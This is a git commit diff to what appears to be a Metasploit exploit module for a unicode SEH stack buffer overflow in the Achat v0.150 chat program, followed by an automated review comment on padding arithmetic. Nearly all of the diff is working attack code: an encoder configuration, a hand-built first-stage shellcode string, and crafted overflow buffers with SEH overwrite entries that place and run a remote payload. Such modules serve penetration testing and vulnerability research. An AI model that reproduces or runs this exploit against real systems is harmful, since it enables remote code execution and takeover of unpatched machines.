proper payload encoding from now on

bug/bundler_fix
Balazs Bucsay 2015-02-09 23:36:35 +01:00
parent c7880ab4e1
commit ac6879cfe1
1 changed files with 5 additions and 6 deletions


@ -13,7 +13,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Achat Beta v0.150 Buffer Overflow',
'Name' => 'Achat v0.150 beta7 Buffer Overflow',
'Description' => %q{
This module exploits a SEH based unicode stack buffer overflow in Achat v0.150,
by sending a crafted message to the default harcoded port 9256. The message
@ -38,9 +38,11 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Payload' =>
{
'DisableNops' => true,
'Space' => 730,
# 'BadChars' => "\x00" + (0x80..0xff).to_a.pack("C*"),
'BadChars' => "\x00" + (0x80..0xff).to_a.pack("C*"),
'StackAdjustment' => -3500,
'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed,
'EncoderOptions' =>
{
'BufferRegister' => 'EAX',
@ -84,9 +86,6 @@ class Metasploit3 < Msf::Exploit::Remote
# 59 POP ECX # padding
# 0039 ADD BYTE PTR DS:[ECX],BH # padding
firststage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
encoder = framework.encoders.create('x86/unicode_mixed')
encoder.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' })
payloadencoded = encoder.encode(payload.raw, nil, nil, platform)
sploit = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
sploit << "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
@ -117,7 +116,7 @@ class Metasploit3 < Msf::Exploit::Remote
sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
sploit << "\x61\x43" + target.ret # second nseh entry, for the second thread
sploit << "\x2A" + firststage + "C"*(157-firststage.length-31-3) # put address of the payload to EAX
sploit << payloadencoded + "A"*(1152-payloadencoded.length) # placing the payload
sploit << payload.encoded + "A"*(1152-payload.encoded.length) # placing the payload
sploit << "\x00" + "A"*10 + "\x00"
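Review bot: The new padding expression `"A"*(1152-payload.encoded.length)` in the last hunk is only safe because the `'Space' => 730` limit introduced in the second hunk keeps the encoded payload inside the 1152-byte slot; nothing on the line records that dependency, so a later edit to either number would surface as a runtime `ArgumentError (negative argument)` from `String#*`. A comment on the new line would pin it: `# 1152-byte payload slot; 'Space' => 730 in the Payload section keeps payload.encoded within it`. With the `encoder`/`payloadencoded` locals removed in the third hunk, the remaining inline comments around `firststage` should be rechecked so they still describe the code that is left. The enclosing exploit method starts before the third hunk and continues past the last line shown.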